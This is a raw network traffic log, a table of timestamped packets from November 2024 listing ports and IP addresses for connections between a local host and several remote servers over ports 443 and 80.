Nov 11, 2024 10:33:27.773691893 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.773809910 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.778048038 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.778069019 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.778131008 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.778199911 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.778199911 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.782979012 CET	49880	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.782994986 CET	443	49880	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.783430099 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.783473969 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.783536911 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.784416914 CET	49878	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.784429073 CET	443	49878	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.784759998 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.784790993 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.784853935 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.785535097 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.785552979 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.786315918 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.786349058 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.787220955 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.787220955 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.788830042 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.788877010 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.788938046 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.790221930 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.790518999 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.790616989 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.794202089 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.794287920 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.794342995 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.795821905 CET	49872	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:27.795840025 CET	443	49872	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:27.799257994 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.799257994 CET	49881	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.799279928 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.799289942 CET	443	49881	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.800806046 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.800812960 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.800823927 CET	49883	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.800828934 CET	443	49883	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.802038908 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.802038908 CET	49882	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.802047968 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.802057028 CET	443	49882	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.807828903 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.807862043 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.807950974 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.808125973 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.808141947 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.809293985 CET	49889	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.809315920 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.809382915 CET	49889	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.810023069 CET	49889	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.810038090 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.810661077 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.810668945 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.812464952 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.812625885 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:27.812638044 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:27.903804064 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.907404900 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.907463074 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.907648087 CET	443	49873	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:27.907705069 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.907721043 CET	49873	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:27.990000963 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:27.990031004 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:27.994910002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:27.994924068 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:28.079099894 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.079135895 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.079197884 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.079221964 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.079245090 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.079540968 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.079565048 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.079622984 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.079634905 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.079648972 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.079701900 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.091837883 CET	49879	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.091865063 CET	443	49879	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.099355936 CET	49876	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.099378109 CET	443	49876	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.165716887 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.165735960 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.165788889 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.165807962 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.165848017 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.167237043 CET	49877	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.167258978 CET	443	49877	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.225075960 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.226850033 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.226850033 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.226865053 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.226876020 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.227963924 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.228477955 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.228492975 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.228882074 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.228885889 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.299552917 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.299781084 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.299794912 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.300152063 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.300461054 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.300529957 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.300600052 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.300849915 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.301045895 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.301062107 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.301390886 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.301664114 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.301716089 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.301757097 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.316685915 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.316901922 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.317014933 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.317075968 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.317075968 CET	49884	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.317090034 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.317095041 CET	443	49884	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.319772005 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.319811106 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.319897890 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.320080042 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.320091009 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.320188046 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.320574045 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.320595980 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.320755005 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.320904016 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.320946932 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.321043015 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.321055889 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.321067095 CET	49885	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.321072102 CET	443	49885	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.321198940 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.321203947 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.321677923 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.322248936 CET	49889	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.322263002 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.322721004 CET	49889	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.322726011 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.323601007 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.323632002 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.323717117 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.323838949 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.323846102 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.326114893 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.326483965 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.326491117 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.326921940 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.326925993 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.347332954 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.347335100 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.394284964 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.394346952 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.394393921 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.395334005 CET	49886	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.395349026 CET	443	49886	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.413531065 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.413676977 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.413731098 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.415604115 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.415613890 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.415627956 CET	49888	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.415632963 CET	443	49888	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.421147108 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.421200991 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.421271086 CET	49889	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.425894976 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.425971031 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.426014900 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.449237108 CET	49889	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.449248075 CET	443	49889	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.450557947 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.450562954 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.450577021 CET	49890	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.450581074 CET	443	49890	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.454909086 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.454931974 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.454982042 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.455652952 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.455661058 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.456671953 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.456703901 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.456847906 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.457076073 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.457087994 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.457386017 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.457406998 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.457461119 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.457568884 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.457578897 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.469543934 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.690833092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:28.690905094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:28.715265989 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.715287924 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.715343952 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.715358973 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.715471983 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.717626095 CET	49887	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:28.717638969 CET	443	49887	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:28.816622019 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816646099 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816653013 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816663027 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816684008 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816724062 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:28.816756010 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816768885 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:28.816802025 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:28.816807985 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816833973 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.816932917 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:28.817843914 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:28.817856073 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.817882061 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:28.817888021 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:28.828985929 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:28.833028078 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.833885908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:28.835984945 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.836018085 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.837076902 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.837088108 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.839576006 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.840303898 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.840334892 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.843777895 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.843786955 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.926299095 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.926492929 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.926649094 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.926793098 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.926810980 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.926820993 CET	49891	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.926826000 CET	443	49891	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.930907011 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.930949926 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.931113005 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.931353092 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.931365967 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.932553053 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.932640076 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.933298111 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.933331966 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.933350086 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.933360100 CET	49892	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.933365107 CET	443	49892	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.936114073 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.936135054 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.936199903 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.936309099 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.936321020 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.969064951 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.969686031 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.969702959 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.970202923 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.970216036 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.971946001 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.972630024 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.972661018 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.973356962 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.973362923 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.977216959 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.977866888 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.977890015 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:28.978678942 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:28.978684902 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.030822992 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:29.030841112 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:29.030854940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:29.030905962 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:29.030941963 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:29.033227921 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:29.040529013 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:29.057347059 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:29.057390928 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:29.057476997 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:29.057764053 CET	49898	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:29.057782888 CET	443	49898	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:29.061876059 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.061938047 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.062015057 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.062453985 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.062469006 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.062486887 CET	49893	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.062491894 CET	443	49893	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.064851999 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.065023899 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.065078020 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.065193892 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.065207958 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.065217018 CET	49895	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.065222025 CET	443	49895	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.065607071 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.065620899 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.065896988 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.066205025 CET	49899	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.066215992 CET	443	49899	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.067512035 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.067548990 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.067608118 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.067718029 CET	49900	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.067728996 CET	443	49900	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.079735994 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.080050945 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.080162048 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.080246925 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.080266953 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.080287933 CET	49894	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.080293894 CET	443	49894	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.082662106 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.082694054 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.082988977 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.083122969 CET	49901	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.083137035 CET	443	49901	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.237487078 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:29.237571955 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:29.255239964 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:29.260059118 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:29.443763018 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.447999001 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.448013067 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.448539019 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.448545933 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.448676109 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.449080944 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.449090004 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.449484110 CET	49897	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.449489117 CET	443	49897	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.536766052 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.536983013 CET	443	49896	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:29.537058115 CET	49896	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:29.541515112 CET	443	49897	13.107.246.45	192.168.2.5
